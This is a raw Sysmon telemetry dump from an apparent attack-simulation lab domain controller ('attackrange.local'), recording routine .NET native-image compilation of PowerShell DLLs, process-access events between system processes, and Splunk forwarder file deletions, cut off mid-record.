21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020559Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.898{4DB9351A-9DDD-60D3-0D00-00000000CF01}904924C:\Windows\system32\svchost.exe{4DB9351A-9F2C-60D3-D000-00000000CF01}5064C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020558Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.836{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C8-60D3-9603-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020557Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.805{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1C8-60D3-9603-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020556Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.805{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C8-60D3-9603-00000000CF01}5452C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020555Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.695{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=161908922E0175A92A1DD7B9F5396FF1,SHA256=3378628E4DE2E4D3B98351FB8EFE4192A3BC3EE547CBF70E04846D02E0455CE2,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020554Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:08.508{4DB9351A-A1C5-60D3-9503-00000000CF01}6356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\18d4-0\Microsoft.PowerShell.Commands.Utility.dll2021-06-23 21:04:08.508 10341000x800000000000000020595Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:09.477{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C9-60D3-9903-00000000CF01}1420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020594Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:09.461{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1C9-60D3-9903-00000000CF01}1420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020593Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:09.461{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C9-60D3-9903-00000000CF01}1420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020592Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:09.398{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C9-60D3-9803-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020591Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:09.383{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1C9-60D3-9803-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020590Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:09.383{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1C9-60D3-9803-00000000CF01}2356C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020589Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:09.352{4DB9351A-A1C8-60D3-9703-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1be4-0\Microsoft.PowerShell.ConsoleHost.dll2021-06-23 21:04:09.352 10341000x800000000000000020588Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:08.992{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1C8-60D3-9703-00000000CF01}7140C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020608Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.993{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CA-60D3-9C03-00000000CF01}1176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020607Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.978{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1CA-60D3-9C03-00000000CF01}1176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020606Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.978{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CA-60D3-9C03-00000000CF01}1176C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020605Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:10.947{4DB9351A-A1CA-60D3-9B03-00000000CF01}6416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1910-0\Microsoft.PowerShell.Diagnostics.Activities.dll2021-06-23 21:04:10.947 10341000x800000000000000020604Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.618{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CA-60D3-9B03-00000000CF01}6416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020603Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.603{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1CA-60D3-9B03-00000000CF01}6416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020602Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.603{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CA-60D3-9B03-00000000CF01}6416C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020601Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.509{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1CA-60D3-9A03-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020600Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.494{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1CA-60D3-9A03-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020599Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.494{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1CA-60D3-9A03-00000000CF01}5676C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020598Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:10.400{4DB9351A-A1C9-60D3-9903-00000000CF01}1420C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\58c-0\Microsoft.PowerShell.Core.Activities.dll2021-06-23 21:04:10.400 23542300x800000000000000020597Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.103{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B954473A399CFB4839A69BD200B3DE5A,SHA256=60329765E284E67653D5C637146BD54B2847AE1ECD1D69EDD0BDA39FB05344A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020596Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:10.103{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6C2BB34D7E0E0202F0E0C7ED2193F1BB,SHA256=5FCC7A1B7A62D5AE447382893700B3863688719420B255FBB93125E08F0C2758,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020613Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:11.587{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 